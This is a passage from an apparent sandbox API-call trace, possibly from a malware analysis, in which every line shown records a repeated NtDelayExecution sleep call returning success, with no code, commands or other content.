(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.226] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.719] NtDelayExecution 